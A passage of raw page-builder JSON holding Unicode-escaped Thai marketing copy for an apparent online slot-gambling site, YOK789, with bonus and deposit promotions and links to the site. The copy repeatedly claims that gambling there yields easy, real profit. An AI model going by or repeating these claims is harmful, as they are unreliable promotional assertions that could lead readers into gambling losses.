href=\\\"https:\\/\\/luca333auto.com\\/\\\"><b>\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e08\\u0e38\\u0e14\\u0e41\\u0e02\\u0e47\\u0e07\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2a\\u0e21\\u0e48\\u0e33\\u0e40\\u0e2a\\u0e21\\u0e2d \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e08\\u0e33\\u0e40\\u0e08 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e44\\u0e23\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2d\\u0e30\\u0e44\\u0e23\\u0e2a\\u0e14\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e2d\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e49\\u0e32\\u0e27\\u0e41\\u0e23\\u0e01\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e2a\\u0e49\\u0e19\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e18\\u0e23\\u0e23\\u0e21\\u0e14\\u0e32<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6b44269\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li><span style=\\\"color: #99cc00;\\\"><b>YOK789 <\\/b><\\/span><b><span style=\\\"color: #99cc00;\\\">\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21<\\/span> <\\/b><\\/li><\\/ul><p><b><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e17\\u0e35\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e22\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e01\\u0e31\\u0e4a\\u0e01 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e42\\u0e1b\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e27\\u0e35\\u0e22\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e48\\u0e27\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e15\\u0e25\\u0e2d\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e21\\u0e35\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32\\u0e1b\\u0e01\\u0e15\\u0e34 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e1e\\u0e35\\u0e04\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e41\\u0e04\\u0e48\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e25\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e21\\u0e35\\u0e1a\\u0e39\\u0e2a\\u0e15\\u0e4c\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2b\\u0e27\\u0e31\\u0e07\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e14\\u0e31\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e44\\u0e14\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e19\\u0e35\\u0e22\\u0e19 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e27\\u0e48\\u0e32\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e0a\\u0e31\\u0e14\\u0e17\\u0e38\\u0e01\\u0e22\\u0e2d\\u0e14<\\/span><\\/b><\\/p><ul><li><b><span style=\\\"color: #99cc00;\\\">\\u0e43\\u0e0a\\u0e49\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49<\\/span> <\\/b><\\/li><\\/ul><p><b><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e32\\u0e22\\u0e07\\u0e1a\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e16\\u0e2d\\u0e22\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e1a\\u0e17\\u0e2a\\u0e1a\\u0e32\\u0e22\\u0e01\\u0e23\\u0e30\\u0e40\\u0e1b\\u0e4b\\u0e32 \\u0e41\\u0e04\\u0e48\\u0e21\\u0e35\\u0e17\\u0e38\\u0e19\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e2a\\u0e34\\u0e1a\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e17\\u0e32\\u0e07\\u0e44\\u0e14\\u0e49\\u0e44\\u0e27 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e14\\u0e14\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e38\\u0e19\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e1b\\u0e31\\u0e49\\u0e19\\u0e01\\u0e33\\u0e44\\u0e23\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e01\\u0e47\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e04\\u0e37\\u0e2d\\u0e41\\u0e21\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e17\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e21\\u0e32\\u0e01\\u0e01\\u0e47\\u0e22\\u0e31\\u0e07\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1a\\u0e48\\u0e07\\u0e0a\\u0e19\\u0e0a\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e17\\u0e48\\u0e32\\u0e01\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e49\\u0e27\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e15\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e42\\u0e15\\u0e02\\u0e36\\u0e49\\u0e19\\u0e15\\u0e32\\u0e21\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07<\\/span><\\/b><\\/p><ul><li><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e04\\u0e23\\u0e1a <\\/b><\\/span><\\/li><\\/ul><p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e19\\u0e27\\u0e44\\u0e27\\u0e49\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22 \\u0e27\\u0e31\\u0e12\\u0e19\\u0e18\\u0e23\\u0e23\\u0e21 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e49\\u0e33\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e16\\u0e39\\u0e01\\u0e04\\u0e31\\u0e14\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e19\\u0e49\\u0e19\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e42\\u0e25\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07 \\u0e08\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e0a\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e01\\u0e23\\u0e30\\u0e08\\u0e32\\u0e22\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e01\\u0e47\\u0e21\\u0e35\\u0e15\\u0e31\\u0e27\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e21\\u0e35\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e14\\u0e23\\u0e2d\\u0e1b \\u0e43\\u0e04\\u0e23\\u0e40\\u0e1a\\u0e37\\u0e48\\u0e2d\\u0e2d\\u0e30\\u0e44\\u0e23\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e46 \\u0e01\\u0e47\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e41\\u0e19\\u0e27\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e25\\u0e31\\u0e07\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e27\\u0e31\\u0e19\\u0e44\\u0e21\\u0e48\\u0e19\\u0e48\\u0e32\\u0e40\\u0e1a\\u0e37\\u0e48\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e2a\\u0e31\\u0e19\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-1-.webp\",\"id\":294,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1a\\u0e2d\\u0e01\\u0e15\\u0e48\\u0e2d\\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19 YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e1b\\u0e31\\u0e19 \\u0e42\\u0e1b\\u0e23 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e2a\\u0e48\\u0e2d\\u0e07\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e0a\\u0e35\\u0e27\\u0e34\\u0e15 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e0a\\u0e47\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e01\\u0e31\\u0e4a\\u0e01 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e15\\u0e49\\u0e2d\\u0e19\\u0e23\\u0e31\\u0e1a \\u0e42\\u0e1b\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e04\\u0e38\\u0e49\\u0e21 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e15\\u0e25\\u0e2d\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e04\\u0e34\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e15\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e33\\u0e19\\u0e27\\u0e13\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e01\\u0e41\\u0e0a\\u0e15\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e41\\u0e04\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e1a\\u0e2d\\u0e01\\u0e40\\u0e25\\u0e22\\u0e27\\u0e48\\u0e32\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e30\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 